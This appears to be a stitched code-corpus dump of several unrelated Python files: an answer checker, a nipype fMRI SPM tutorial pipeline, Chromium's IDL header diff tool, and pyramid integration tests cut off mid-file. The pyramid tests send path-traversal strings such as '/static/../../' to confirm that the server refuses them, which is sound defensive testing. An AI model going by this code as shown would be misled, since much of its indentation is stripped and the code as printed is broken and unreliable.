bool: True of the answer is an acceptable answer, false otherwise
Examples:
>>> is_acceptable_answer(100, '1.00e2')
True
>>> is_acceptable_answer(100, '1.01e2')
True
>>> is_acceptable_answer(100, '1.02e2')
False
"""
    # TODO Handle errors better with loop
    try:
        correct_answer = convert_to_scientific_notation(int(correct_answer))
    except ValueError:
        # Non-integer input: fall back to float so the split below still works.
        correct_answer = convert_to_scientific_notation(float(correct_answer))
number, exponent = correct_answer.split("e")
number = float(number)
max_number = number + .01
min_number = number - .01
max_number = str(max_number) + "e" + exponent
min_number = str(min_number) + "e" + exponent
min_number = int(float(min_number))
max_number = int(float(max_number))
if min_number <= int(float(response)) <= max_number:
return True
return False
def multiple_replace(text, variable_dict):
"""
Args:
text (str): The text to replace keys with values
variable_dict (dict): The dictionary that holds the keys and values
Returns:
str: Text with the keys replaced with values
Examples:
>>> multiple_replace("A B C a b c", {"a":10, "A": 10})
'10 B C 10 b c'
"""
for key in variable_dict:
text = text.replace(key, str(variable_dict[key]))
return text
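# Minimal doctest runner for the examples above (a convenience sketch):
if __name__ == "__main__":
    import doctest
    doctest.testmod()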
| mit |
grlee77/nipype | examples/fmri_spm.py | 9 | 16091 | #!/usr/bin/env python
# emacs: -*- mode: python; py-indent-offset: 4; indent-tabs-mode: nil -*-
# vi: set ft=python sts=4 ts=4 sw=4 et:
"""
==============
fMRI: SPM, FSL
==============
The fmri_spm.py integrates several interfaces to perform a first
and second level analysis on a two-subject data set. The tutorial can
be found in the examples folder. Run the tutorial from inside the
nipype tutorial directory::
python fmri_spm.py
Import necessary modules from nipype."""
import os # system functions
from nipype import config
#config.enable_provenance()
from nipype.interfaces import spm, fsl
# In order to use this example with SPM's matlab common runtime
# matlab_cmd = ('/Users/satra/Downloads/spm8/run_spm8.sh '
# '/Applications/MATLAB/MATLAB_Compiler_Runtime/v713/ script')
# spm.SPMCommand.set_mlab_paths(matlab_cmd=matlab_cmd, use_mcr=True)
import nipype.interfaces.io as nio # Data i/o
import nipype.interfaces.utility as util # utility
import nipype.pipeline.engine as pe # pypeline engine
import nipype.algorithms.rapidart as ra # artifact detection
import nipype.algorithms.modelgen as model # model specification
import nipype.interfaces.matlab as mlab
"""
Preliminaries
-------------
Set any package specific configuration. The output file format
for FSL routines is being set to uncompressed NIFTI and a specific
version of matlab is being used. The uncompressed format is required
because SPM does not handle compressed NIFTI.
"""
# Tell fsl to generate all output in uncompressed nifti format
fsl.FSLCommand.set_default_output_type('NIFTI')
# Set the way matlab should be called
# import nipype.interfaces.matlab as mlab # how to run matlab
# mlab.MatlabCommand.set_default_matlab_cmd("matlab -nodesktop -nosplash")
# In case a different path is required
# mlab.MatlabCommand.set_default_paths('/software/matlab/spm12b/spm12b_r5918')
"""The nipype tutorial contains data for two subjects. Subject data
is in two subdirectories, ``s1`` and ``s2``. Each subject directory
contains four functional volumes: f3.nii, f5.nii, f7.nii, f10.nii. And
one anatomical volume named struct.nii.
Below we set some variables to inform the ``datasource`` about the
layout of our data. We specify the location of the data, the subject
sub-directories and a dictionary that maps each run to a mnemonic (or
field) for the run type (``struct`` or ``func``). These fields become
the output fields of the ``datasource`` node in the pipeline.
In the example below, run 'f3' is of type 'func' and gets mapped to a
nifti filename through a template '%s.nii'. So 'f3' would become
'f3.nii'.
"""
# Specify the location of the data.
data_dir = os.path.abspath('data')
# Specify the subject directories
subject_list = ['s1', 's3']
# Map field names to individual subject runs.
info = dict(func=[['subject_id', ['f3','f5','f7','f10']]],
struct=[['subject_id','struct']])
infosource = pe.Node(interface=util.IdentityInterface(fields=['subject_id']),
name="infosource")
"""Here we set up iteration over all the subjects. The following line
is a particular example of the flexibility of the system. The
``datasource`` attribute ``iterables`` tells the pipeline engine that
it should repeat the analysis on each of the items in the
``subject_list``. In the current example, the entire first level
preprocessing and estimation will be repeated for each subject
contained in subject_list.
"""
infosource.iterables = ('subject_id', subject_list)
"""
Preprocessing pipeline nodes
----------------------------
Now we create a :class:`nipype.interfaces.io.DataSource` object and
fill in the information from above about the layout of our data. The
:class:`nipype.pipeline.NodeWrapper` module wraps the interface object
and provides additional housekeeping and pipeline specific
functionality.
"""
datasource = pe.Node(interface=nio.DataGrabber(infields=['subject_id'],
outfields=['func', 'struct']),
name = 'datasource')
datasource.inputs.base_directory = data_dir
datasource.inputs.template = '%s/%s.nii'
datasource.inputs.template_args = info
datasource.inputs.sort_filelist = True
"""Use :class:`nipype.interfaces.spm.Realign` for motion correction
and register all images to the mean image.
"""
realign = pe.Node(interface=spm.Realign(), name="realign")
realign.inputs.register_to_mean = True
"""Use :class:`nipype.algorithms.rapidart` to determine which of the
images in the functional series are outliers based on deviations in
intensity or movement.
"""
art = pe.Node(interface=ra.ArtifactDetect(), name="art")
art.inputs.use_differences = [True, False]
art.inputs.use_norm = True
art.inputs.norm_threshold = 1
art.inputs.zintensity_threshold = 3
art.inputs.mask_type = 'file'
art.inputs.parameter_source = 'SPM'
"""Skull strip structural images using
:class:`nipype.interfaces.fsl.BET`.
"""
skullstrip = pe.Node(interface=fsl.BET(), name="skullstrip")
skullstrip.inputs.mask = True
"""Use :class:`nipype.interfaces.spm.Coregister` to perform a rigid
body registration of the functional data to the structural data.
"""
coregister = pe.Node(interface=spm.Coregister(), name="coregister")
coregister.inputs.jobtype = 'estimate'
"""Warp functional and structural data to SPM's T1 template using
:class:`nipype.interfaces.spm.Normalize`. The tutorial data set
includes the template image, T1.nii.
"""
normalize = pe.Node(interface=spm.Normalize(), name = "normalize")
normalize.inputs.template = os.path.abspath('data/T1.nii')
"""Smooth the functional data using
:class:`nipype.interfaces.spm.Smooth`.
"""
smooth = pe.Node(interface=spm.Smooth(), name = "smooth")
fwhmlist = [4]
smooth.iterables = ('fwhm',fwhmlist)
"""
Set up analysis components
--------------------------
Here we create a function that returns subject-specific information
about the experimental paradigm. This is used by the
:class:`nipype.interfaces.spm.SpecifyModel` to create the information
necessary to generate an SPM design matrix. In this tutorial, the same
paradigm was used for every participant.
"""
def subjectinfo(subject_id):
from nipype.interfaces.base import Bunch
from copy import deepcopy
print "Subject ID: %s\n"%str(subject_id)
output = []
names = ['Task-Odd','Task-Even']
for r in range(4):
onsets = [range(15,240,60),range(45,240,60)]
output.insert(r,
Bunch(conditions=names,
onsets=deepcopy(onsets),
durations=[[15] for s in names]))
return output
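# Illustratively, subjectinfo('s1') returns four identical Bunch objects
# (one per run), each equivalent to:
#   Bunch(conditions=['Task-Odd', 'Task-Even'],
#         onsets=[[15, 75, 135, 195], [45, 105, 165, 225]],
#         durations=[[15], [15]])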
"""Setup the contrast structure that needs to be evaluated. This is a
list of lists. The inner list specifies the contrasts and has the
following format - [Name,Stat,[list of condition names],[weights on
those conditions]. The condition names must match the `names` listed
in the `subjectinfo` function described above.
"""
cont1 = ('Task>Baseline','T', ['Task-Odd','Task-Even'],[0.5,0.5])
cont2 = ('Task-Odd>Task-Even','T', ['Task-Odd','Task-Even'],[1,-1])
contrasts = [cont1,cont2]
"""Generate SPM-specific design information using
:class:`nipype.interfaces.spm.SpecifyModel`.
"""
modelspec = pe.Node(interface=model.SpecifySPMModel(), name= "modelspec")
modelspec.inputs.concatenate_runs = False
modelspec.inputs.input_units = 'secs'
modelspec.inputs.output_units = 'secs'
modelspec.inputs.time_repetition = 3.
modelspec.inputs.high_pass_filter_cutoff = 120
"""Generate a first level SPM.mat file for analysis
:class:`nipype.interfaces.spm.Level1Design`.
"""
level1design = pe.Node(interface=spm.Level1Design(), name= "level1design")
level1design.inputs.timing_units = modelspec.inputs.output_units
level1design.inputs.interscan_interval = modelspec.inputs.time_repetition
level1design.inputs.bases = {'hrf':{'derivs': [0,0]}}
"""Use :class:`nipype.interfaces.spm.EstimateModel` to determine the
parameters of the model.
"""
level1estimate = pe.Node(interface=spm.EstimateModel(), name="level1estimate")
level1estimate.inputs.estimation_method = {'Classical' : 1}
"""Use :class:`nipype.interfaces.spm.EstimateContrast` to estimate the
first level contrasts specified in a few steps above.
"""
contrastestimate = pe.Node(interface = spm.EstimateContrast(), name="contrastestimate")
contrastestimate.inputs.contrasts = contrasts
contrastestimate.overwrite = True
contrastestimate.config = {'execution': {'remove_unnecessary_outputs': False}}
"""
Setup the pipeline
------------------
The nodes created above do not describe the flow of data. They merely
describe the parameters used for each function. In this section we
setup the connections between the nodes such that appropriate outputs
from nodes are piped into appropriate inputs of other nodes.
Use the :class:`nipype.pipeline.engine.Pipeline` to create a
graph-based execution pipeline for first level analysis. The config
options tells the pipeline engine to use `workdir` as the disk
location to use when running the processes and keeping their
outputs. The `use_parameterized_dirs` tells the engine to create
sub-directories under `workdir` corresponding to the iterables in the
pipeline. Thus for this pipeline there will be subject specific
sub-directories.
The ``nipype.pipeline.engine.Pipeline.connect`` function creates the
links between the processes, i.e., how data should flow in and out of
the processing nodes.
"""
l1pipeline = pe.Workflow(name="level1")
l1pipeline.base_dir = os.path.abspath('spm_tutorial/workingdir')
l1pipeline.connect([(infosource, datasource, [('subject_id', 'subject_id')]),
(datasource,realign,[('func','in_files')]),
(realign,coregister,[('mean_image', 'source'),
('realigned_files','apply_to_files')]),
(datasource,coregister,[('struct', 'target')]),
(datasource,normalize,[('struct', 'source')]),
(coregister, normalize, [('coregistered_files','apply_to_files')]),
(normalize, smooth, [('normalized_files', 'in_files')]),
(infosource,modelspec,[(('subject_id', subjectinfo),
'subject_info')]),
(realign,modelspec,[('realignment_parameters','realignment_parameters')]),
(smooth,modelspec,[('smoothed_files','functional_runs')]),
(normalize,skullstrip,[('normalized_source','in_file')]),
(realign,art,[('realignment_parameters','realignment_parameters')]),
(normalize,art,[('normalized_files','realigned_files')]),
(skullstrip,art,[('mask_file','mask_file')]),
(art,modelspec,[('outlier_files','outlier_files')]),
(modelspec,level1design,[('session_info','session_info')]),
(skullstrip,level1design,[('mask_file','mask_image')]),
(level1design,level1estimate,[('spm_mat_file','spm_mat_file')]),
(level1estimate,contrastestimate,[('spm_mat_file','spm_mat_file'),
('beta_images','beta_images'),
('residual_image','residual_image')]),
])
"""
Setup storage results
---------------------
Use :class:`nipype.interfaces.io.DataSink` to store selected outputs
from the pipeline in a specific location. This allows the user to
selectively choose important output bits from the analysis and keep
them.
The first step is to create a datasink node and then to connect
outputs from the modules above to storage locations. These take the
following form directory_name[.[@]subdir] where parts between [] are
optional. For example 'realign.@mean' below creates a directory called
realign in 'l1output/subject_id/' and stores the mean image output
from the Realign process in the realign directory. If the @ is left
out, then a sub-directory with the name 'mean' would be created and
the mean image would be copied to that directory.
"""
datasink = pe.Node(interface=nio.DataSink(), name="datasink")
datasink.inputs.base_directory = os.path.abspath('spm_tutorial/l1output')
def getstripdir(subject_id):
import os
return os.path.join(os.path.abspath('spm_tutorial/workingdir'),'_subject_id_%s' % subject_id)
# store relevant outputs from various stages of the 1st level analysis
l1pipeline.connect([(infosource,datasink,[('subject_id','container'),
(('subject_id', getstripdir),'strip_dir')]),
(realign,datasink,[('mean_image','realign.@mean'),
('realignment_parameters','realign.@param')]),
(art,datasink,[('outlier_files','art.@outliers'),
('statistic_files','art.@stats')]),
(level1design,datasink,[('spm_mat_file','model.pre-estimate')]),
(level1estimate,datasink,[('spm_mat_file','model.@spm'),
('beta_images','model.@beta'),
('mask_image','model.@mask'),
('residual_image','model.@res'),
('RPVimage','model.@rpv')]),
(contrastestimate,datasink,[('con_images','contrasts.@con'),
('spmT_images','contrasts.@T')]),
])
"""
Setup level 2 pipeline
----------------------
Use :class:`nipype.interfaces.io.DataGrabber` to extract the contrast
images across a group of first level subjects. Unlike the previous
pipeline that iterated over subjects, this pipeline will iterate over
contrasts.
"""
# collect all the con images for each contrast.
contrast_ids = range(1,len(contrasts)+1)
l2source = pe.Node(nio.DataGrabber(infields=['fwhm', 'con']), name="l2source")
# we use .*i* to capture both .img (SPM8) and .nii (SPM12)
l2source.inputs.template=os.path.abspath('spm_tutorial/l1output/*/con*/*/_fwhm_%d/con_%04d.*i*')
# iterate over all contrast images
l2source.iterables = [('fwhm',fwhmlist),
('con',contrast_ids)]
l2source.inputs.sort_filelist = True
"""Use :class:`nipype.interfaces.spm.OneSampleTTestDesign` to perform a
simple statistical analysis of the contrasts from the group of
subjects (n=2 in this example).
"""
# setup a 1-sample t-test node
onesamplettestdes = pe.Node(interface=spm.OneSampleTTestDesign(), name="onesampttestdes")
l2estimate = pe.Node(interface=spm.EstimateModel(), name="level2estimate")
l2estimate.inputs.estimation_method = {'Classical' : 1}
l2conestimate = pe.Node(interface = spm.EstimateContrast(), name="level2conestimate")
cont1 = ('Group','T', ['mean'],[1])
l2conestimate.inputs.contrasts = [cont1]
l2conestimate.inputs.group_contrast = True
"""As before, we setup a pipeline to connect these two nodes (l2source
-> onesamplettest).
"""
l2pipeline = pe.Workflow(name="level2")
l2pipeline.base_dir = os.path.abspath('spm_tutorial/l2output')
l2pipeline.connect([(l2source,onesamplettestdes,[('outfiles','in_files')]),
(onesamplettestdes,l2estimate,[('spm_mat_file','spm_mat_file')]),
(l2estimate,l2conestimate,[('spm_mat_file','spm_mat_file'),
('beta_images','beta_images'),
('residual_image','residual_image')]),
])
"""
Execute the pipeline
--------------------
The code discussed above sets up all the necessary data structures
with appropriate parameters and the connectivity between the
processes, but does not generate any output. To actually run the
analysis on the data the ``nipype.pipeline.engine.Pipeline.Run``
function needs to be called.
"""
if __name__ == '__main__':
l1pipeline.run('MultiProc')
l2pipeline.run('MultiProc')
| bsd-3-clause |
hgl888/chromium-crosswalk-efl | ppapi/generators/idl_diff.py | 180 | 9073 | #!/usr/bin/env python
# Copyright (c) 2012 The Chromium Authors. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import glob
import os
import subprocess
import sys
from idl_option import GetOption, Option, ParseOptions
from idl_outfile import IDLOutFile
#
# IDLDiff
#
# IDLDiff is a tool for comparing sets of IDL generated header files
# with the standard checked in headers. It does this by capturing the
# output of the standard diff tool, parsing it into separate changes, then
# ignoring changes that are know to be safe, such as adding or removing
# blank lines, etc...
#
Option('gen', 'IDL generated files', default='hdir')
Option('src', 'Original ".h" files', default='../c')
Option('halt', 'Stop if a difference is found')
Option('diff', 'Directory holding acceptable diffs', default='diff')
Option('ok', 'Write out the diff file.')
# Change
#
# A Change object contains the previous lines, new news and change type.
#
class Change(object):
def __init__(self, mode, was, now):
self.mode = mode
self.was = was
self.now = now
def Dump(self):
if not self.was:
print 'Adding %s' % self.mode
elif not self.now:
print 'Missing %s' % self.mode
else:
print 'Modifying %s' % self.mode
for line in self.was:
print 'src: >>%s<<' % line
for line in self.now:
print 'gen: >>%s<<' % line
print
#
# IsCopyright
#
# Return True if this change is only a one line change in the copyright notice
# such as non-matching years.
#
def IsCopyright(change):
if len(change.now) != 1 or len(change.was) != 1: return False
if 'Copyright (c)' not in change.now[0]: return False
if 'Copyright (c)' not in change.was[0]: return False
return True
#
# IsBlankComment
#
# Return True if this change only removes a blank line from a comment
#
def IsBlankComment(change):
if change.now: return False
if len(change.was) != 1: return False
if change.was[0].strip() != '*': return False
return True
#
# IsBlank
#
# Return True if this change only adds or removes blank lines
#
def IsBlank(change):
for line in change.now:
if line: return False
for line in change.was:
if line: return False
return True
#
# IsToCppComment
#
# Return True if this change only converts C++ comments to C style
#
def IsToCppComment(change):
if not len(change.now) or len(change.now) != len(change.was):
return False
for index in range(len(change.now)):
was = change.was[index].strip()
if was[:2] != '//':
return False
was = was[2:].strip()
now = change.now[index].strip()
if now[:2] != '/*':
return False
now = now[2:-2].strip()
if now != was:
return False
  return True
def IsMergeComment(change):
if len(change.was) != 1: return False
if change.was[0].strip() != '*': return False
for line in change.now:
stripped = line.strip()
if stripped != '*' and stripped[:2] != '/*' and stripped[-2:] != '*/':
return False
return True
#
# IsSpacing
#
# Return True if this change is only different in the way 'words' are spaced
# such as in an enum:
# ENUM_XXX = 1,
# ENUM_XYY_Y = 2,
# vs
# ENUM_XXX = 1,
# ENUM_XYY_Y = 2,
#
def IsSpacing(change):
if len(change.now) != len(change.was): return False
for i in range(len(change.now)):
# Also ignore right side comments
line = change.was[i]
offs = line.find('//')
if offs == -1:
offs = line.find('/*')
    if offs > -1:
line = line[:offs-1]
words1 = change.now[i].split()
words2 = line.split()
if words1 != words2: return False
return True
#
# IsInclude
#
# Return True if change has extra includes
#
def IsInclude(change):
for line in change.was:
if line.strip().find('struct'): return False
for line in change.now:
if line and '#include' not in line: return False
return True
#
# IsCppComment
#
# Return True if the change is only missing C++ comments
#
def IsCppComment(change):
if len(change.now): return False
for line in change.was:
line = line.strip()
if line[:2] != '//': return False
return True
#
# ValidChange
#
# Return True if none of the changes does not patch an above "bogus" change.
#
def ValidChange(change):
if IsToCppComment(change): return False
if IsCopyright(change): return False
if IsBlankComment(change): return False
if IsMergeComment(change): return False
if IsBlank(change): return False
if IsSpacing(change): return False
if IsInclude(change): return False
if IsCppComment(change): return False
return True
#
# Swapped
#
# Check if the combination of last + next change signals they are both
# invalid such as swap of line around an invalid block.
#
def Swapped(last, next):
if not last.now and not next.was and len(last.was) == len(next.now):
cnt = len(last.was)
for i in range(cnt):
match = True
for j in range(cnt):
if last.was[j] != next.now[(i + j) % cnt]:
match = False
          break
if match: return True
if not last.was and not next.now and len(last.now) == len(next.was):
cnt = len(last.now)
for i in range(cnt):
match = True
for j in range(cnt):
        if last.now[j] != next.was[(i + j) % cnt]:
          match = False
          break
if match: return True
return False
def FilterLinesIn(output):
was = []
now = []
filter = []
for index in range(len(output)):
filter.append(False)
line = output[index]
if len(line) < 2: continue
if line[0] == '<':
if line[2:].strip() == '': continue
was.append((index, line[2:]))
elif line[0] == '>':
if line[2:].strip() == '': continue
now.append((index, line[2:]))
for windex, wline in was:
for nindex, nline in now:
if filter[nindex]: continue
if filter[windex]: continue
if wline == nline:
filter[nindex] = True
filter[windex] = True
if GetOption('verbose'):
print "Found %d, %d >>%s<<" % (windex + 1, nindex + 1, wline)
out = []
for index in range(len(output)):
if not filter[index]:
out.append(output[index])
return out
#
# GetChanges
#
# Parse the output into discrete change blocks.
#
def GetChanges(output):
# Split on lines, adding an END marker to simply add logic
lines = output.split('\n')
lines = FilterLinesIn(lines)
lines.append('END')
changes = []
was = []
now = []
mode = ''
last = None
for line in lines:
# print "LINE=%s" % line
if not line: continue
elif line[0] == '<':
if line[2:].strip() == '': continue
# Ignore prototypes
if len(line) > 10:
words = line[2:].split()
if len(words) == 2 and words[1][-1] == ';':
if words[0] == 'struct' or words[0] == 'union':
continue
was.append(line[2:])
elif line[0] == '>':
if line[2:].strip() == '': continue
if line[2:10] == '#include': continue
now.append(line[2:])
elif line[0] == '-':
continue
else:
change = Change(line, was, now)
was = []
now = []
if ValidChange(change):
changes.append(change)
if line == 'END':
break
return FilterChanges(changes)
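# Illustrative parse of one standard diff chunk (line numbers made up):
#   12c12
#   < old text
#   ---
#   > new text
#   END
# The leading '12c12' flushes an empty Change that ValidChange() discards;
# the final 'END' flushes Change('END', ['old text'], ['new text']).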
def FilterChanges(changes):
if len(changes) < 2: return changes
out = []
filter = [False for change in changes]
for cur in range(len(changes)):
for cmp in range(cur+1, len(changes)):
if filter[cmp]:
continue
if Swapped(changes[cur], changes[cmp]):
filter[cur] = True
filter[cmp] = True
for cur in range(len(changes)):
if filter[cur]: continue
out.append(changes[cur])
return out
def Main(args):
filenames = ParseOptions(args)
if not filenames:
gendir = os.path.join(GetOption('gen'), '*.h')
filenames = sorted(glob.glob(gendir))
srcdir = os.path.join(GetOption('src'), '*.h')
srcs = sorted(glob.glob(srcdir))
for name in srcs:
name = os.path.split(name)[1]
name = os.path.join(GetOption('gen'), name)
if name not in filenames:
print 'Missing: %s' % name
for filename in filenames:
gen = filename
filename = filename[len(GetOption('gen')) + 1:]
src = os.path.join(GetOption('src'), filename)
diff = os.path.join(GetOption('diff'), filename)
p = subprocess.Popen(['diff', src, gen], stdout=subprocess.PIPE)
output, errors = p.communicate()
try:
input = open(diff, 'rt').read()
except:
input = ''
if input != output:
changes = GetChanges(output)
else:
changes = []
if changes:
print "\n\nDelta between:\n src=%s\n gen=%s\n" % (src, gen)
for change in changes:
change.Dump()
print 'Done with %s\n\n' % src
if GetOption('ok'):
open(diff, 'wt').write(output)
if GetOption('halt'):
return 1
else:
print "\nSAME:\n src=%s\n gen=%s" % (src, gen)
if input: print ' ** Matched expected diff. **'
print '\n'
if __name__ == '__main__':
sys.exit(Main(sys.argv[1:]))
| bsd-3-clause |
gamesbrewer/kegger | kegger/myapp/libs/pyramid/tests/test_integration.py | 2 | 27516 | # -*- coding: utf-8 -*-
import datetime
import locale
import os
import unittest
from pyramid.wsgi import wsgiapp
from pyramid.view import view_config
from pyramid.static import static_view
from pyramid.compat import (
text_,
url_quote,
)
from zope.interface import Interface
# 5 years from now (more or less)
fiveyrsfuture = datetime.datetime.utcnow() + datetime.timedelta(5*365)
defaultlocale = locale.getdefaultlocale()[1]
class INothing(Interface):
pass
@view_config(for_=INothing)
@wsgiapp
def wsgiapptest(environ, start_response):
""" """
return '123'
class WSGIAppPlusViewConfigTests(unittest.TestCase):
def test_it(self):
from venusian import ATTACH_ATTR
import types
self.assertTrue(getattr(wsgiapptest, ATTACH_ATTR))
self.assertTrue(type(wsgiapptest) is types.FunctionType)
context = DummyContext()
request = DummyRequest()
result = wsgiapptest(context, request)
self.assertEqual(result, '123')
def test_scanned(self):
from pyramid.interfaces import IRequest
from pyramid.interfaces import IView
from pyramid.interfaces import IViewClassifier
from pyramid.config import Configurator
from pyramid.tests import test_integration
config = Configurator()
config.scan(test_integration)
config.commit()
reg = config.registry
view = reg.adapters.lookup(
(IViewClassifier, IRequest, INothing), IView, name='')
self.assertEqual(view.__original_view__, wsgiapptest)
class IntegrationBase(object):
root_factory = None
package = None
def setUp(self):
from pyramid.config import Configurator
config = Configurator(root_factory=self.root_factory,
package=self.package)
config.include(self.package)
app = config.make_wsgi_app()
from webtest import TestApp
self.testapp = TestApp(app)
self.config = config
def tearDown(self):
self.config.end()
here = os.path.dirname(__file__)
class StaticAppBase(IntegrationBase):
def test_basic(self):
res = self.testapp.get('/minimal.txt', status=200)
_assertBody(res.body, os.path.join(here, 'fixtures/minimal.txt'))
def test_hidden(self):
res = self.testapp.get('/static/.hiddenfile', status=200)
_assertBody(res.body, os.path.join(here, 'fixtures/static/.hiddenfile'))
if defaultlocale is not None:
# These tests are expected to fail on LANG=C systems due to decode
# errors and on non-Linux systems due to git highchar handling
# vagaries
def test_highchars_in_pathelement(self):
path = os.path.join(
here,
text_('fixtures/static/héhé/index.html', 'utf-8'))
pathdir = os.path.dirname(path)
body = b'<html>hehe</html>\n'
try:
os.makedirs(pathdir)
with open(path, 'wb') as fp:
fp.write(body)
url = url_quote('/static/héhé/index.html')
res = self.testapp.get(url, status=200)
self.assertEqual(res.body, body)
finally:
os.unlink(path)
os.rmdir(pathdir)
def test_highchars_in_filename(self):
path = os.path.join(
here,
text_('fixtures/static/héhé.html', 'utf-8'))
body = b'<html>hehe file</html>\n'
with open(path, 'wb') as fp:
fp.write(body)
try:
url = url_quote('/static/héhé.html')
res = self.testapp.get(url, status=200)
self.assertEqual(res.body, body)
finally:
os.unlink(path)
def test_not_modified(self):
self.testapp.extra_environ = {
'HTTP_IF_MODIFIED_SINCE':httpdate(fiveyrsfuture)}
res = self.testapp.get('/minimal.txt', status=304)
self.assertEqual(res.body, b'')
def test_file_in_subdir(self):
fn = os.path.join(here, 'fixtures/static/index.html')
res = self.testapp.get('/static/index.html', status=200)
_assertBody(res.body, fn)
def test_directory_noslash_redir(self):
res = self.testapp.get('/static', status=301)
self.assertEqual(res.headers['Location'], 'http://localhost/static/')
def test_directory_noslash_redir_preserves_qs(self):
res = self.testapp.get('/static?a=1&b=2', status=301)
self.assertEqual(res.headers['Location'],
'http://localhost/static/?a=1&b=2')
def test_directory_noslash_redir_with_scriptname(self):
self.testapp.extra_environ = {'SCRIPT_NAME':'/script_name'}
res = self.testapp.get('/static', status=301)
self.assertEqual(res.headers['Location'],
'http://localhost/script_name/static/')
def test_directory_withslash(self):
fn = os.path.join(here, 'fixtures/static/index.html')
res = self.testapp.get('/static/', status=200)
_assertBody(res.body, fn)
def test_range_inclusive(self):
self.testapp.extra_environ = {'HTTP_RANGE':'bytes=1-2'}
res = self.testapp.get('/static/index.html', status=206)
self.assertEqual(res.body, b'ht')
def test_range_tilend(self):
self.testapp.extra_environ = {'HTTP_RANGE':'bytes=-5'}
res = self.testapp.get('/static/index.html', status=206)
self.assertEqual(res.body, b'html>')
def test_range_notbytes(self):
self.testapp.extra_environ = {'HTTP_RANGE':'kHz=-5'}
res = self.testapp.get('/static/index.html', status=200)
_assertBody(res.body,
os.path.join(here, 'fixtures/static/index.html'))
def test_range_multiple(self):
res = self.testapp.get('/static/index.html',
[('HTTP_RANGE', 'bytes=10-11,11-12')],
status=200)
_assertBody(res.body,
os.path.join(here, 'fixtures/static/index.html'))
def test_range_oob(self):
self.testapp.extra_environ = {'HTTP_RANGE':'bytes=1000-1002'}
self.testapp.get('/static/index.html', status=416)
def test_notfound(self):
self.testapp.get('/static/wontbefound.html', status=404)
def test_oob_dotdotslash(self):
self.testapp.get('/static/../../test_integration.py', status=404)
def test_oob_dotdotslash_encoded(self):
self.testapp.get('/static/%2E%2E%2F/test_integration.py', status=404)
def test_oob_slash(self):
self.testapp.get('/%2F/test_integration.py', status=404)
class TestEventOnlySubscribers(IntegrationBase, unittest.TestCase):
package = 'pyramid.tests.pkgs.eventonly'
def test_sendfoo(self):
res = self.testapp.get('/sendfoo', status=200)
self.assertEqual(sorted(res.body.split()), [b'foo', b'fooyup'])
def test_sendfoobar(self):
res = self.testapp.get('/sendfoobar', status=200)
self.assertEqual(sorted(res.body.split()),
[b'foobar', b'foobar2', b'foobaryup', b'foobaryup2'])
class TestStaticAppUsingAbsPath(StaticAppBase, unittest.TestCase):
package = 'pyramid.tests.pkgs.static_abspath'
class TestStaticAppUsingAssetSpec(StaticAppBase, unittest.TestCase):
package = 'pyramid.tests.pkgs.static_assetspec'
class TestStaticAppNoSubpath(unittest.TestCase):
staticapp = static_view(os.path.join(here, 'fixtures'), use_subpath=False)
def _makeRequest(self, extra):
from pyramid.request import Request
from io import BytesIO
kw = {'PATH_INFO':'',
'SCRIPT_NAME':'',
'SERVER_NAME':'localhost',
'SERVER_PORT':'80',
'REQUEST_METHOD':'GET',
'wsgi.version':(1,0),
'wsgi.url_scheme':'http',
'wsgi.input':BytesIO()}
kw.update(extra)
request = Request(kw)
return request
def test_basic(self):
request = self._makeRequest({'PATH_INFO':'/minimal.txt'})
context = DummyContext()
result = self.staticapp(context, request)
self.assertEqual(result.status, '200 OK')
_assertBody(result.body, os.path.join(here, 'fixtures/minimal.txt'))
class TestStaticAppWithRoutePrefix(IntegrationBase, unittest.TestCase):
package = 'pyramid.tests.pkgs.static_routeprefix'
def test_includelevel1(self):
res = self.testapp.get('/static/minimal.txt', status=200)
_assertBody(res.body,
os.path.join(here, 'fixtures/minimal.txt'))
def test_includelevel2(self):
res = self.testapp.get('/prefix/static/index.html', status=200)
_assertBody(res.body,
os.path.join(here, 'fixtures/static/index.html'))
class TestFixtureApp(IntegrationBase, unittest.TestCase):
package = 'pyramid.tests.pkgs.fixtureapp'
def test_another(self):
res = self.testapp.get('/another.html', status=200)
self.assertEqual(res.body, b'fixture')
def test_root(self):
res = self.testapp.get('/', status=200)
self.assertEqual(res.body, b'fixture')
def test_dummyskin(self):
self.testapp.get('/dummyskin.html', status=404)
def test_error(self):
res = self.testapp.get('/error.html', status=200)
self.assertEqual(res.body, b'supressed')
def test_protected(self):
self.testapp.get('/protected.html', status=403)
class TestStaticPermApp(IntegrationBase, unittest.TestCase):
package = 'pyramid.tests.pkgs.staticpermapp'
root_factory = 'pyramid.tests.pkgs.staticpermapp:RootFactory'
def test_allowed(self):
result = self.testapp.get('/allowed/index.html', status=200)
_assertBody(result.body,
os.path.join(here, 'fixtures/static/index.html'))
def test_denied_via_acl_global_root_factory(self):
self.testapp.extra_environ = {'REMOTE_USER':'bob'}
self.testapp.get('/protected/index.html', status=403)
def test_allowed_via_acl_global_root_factory(self):
self.testapp.extra_environ = {'REMOTE_USER':'fred'}
result = self.testapp.get('/protected/index.html', status=200)
_assertBody(result.body,
os.path.join(here, 'fixtures/static/index.html'))
def test_denied_via_acl_local_root_factory(self):
self.testapp.extra_environ = {'REMOTE_USER':'fred'}
self.testapp.get('/factory_protected/index.html', status=403)
def test_allowed_via_acl_local_root_factory(self):
self.testapp.extra_environ = {'REMOTE_USER':'bob'}
result = self.testapp.get('/factory_protected/index.html', status=200)
_assertBody(result.body,
os.path.join(here, 'fixtures/static/index.html'))
class TestCCBug(IntegrationBase, unittest.TestCase):
# "unordered" as reported in IRC by author of
# http://labs.creativecommons.org/2010/01/13/cc-engine-and-web-non-frameworks/
package = 'pyramid.tests.pkgs.ccbugapp'
def test_rdf(self):
res = self.testapp.get('/licenses/1/v1/rdf', status=200)
self.assertEqual(res.body, b'rdf')
def test_juri(self):
res = self.testapp.get('/licenses/1/v1/juri', status=200)
self.assertEqual(res.body, b'juri')
class TestHybridApp(IntegrationBase, unittest.TestCase):
# make sure views registered for a route "win" over views registered
# without one, even though the context of the non-route view may
# be more specific than the route view.
package = 'pyramid.tests.pkgs.hybridapp'
def test_root(self):
res = self.testapp.get('/', status=200)
self.assertEqual(res.body, b'global')
def test_abc(self):
res = self.testapp.get('/abc', status=200)
self.assertEqual(res.body, b'route')
def test_def(self):
res = self.testapp.get('/def', status=200)
self.assertEqual(res.body, b'route2')
def test_ghi(self):
res = self.testapp.get('/ghi', status=200)
self.assertEqual(res.body, b'global')
def test_jkl(self):
self.testapp.get('/jkl', status=404)
def test_mno(self):
self.testapp.get('/mno', status=404)
def test_pqr_global2(self):
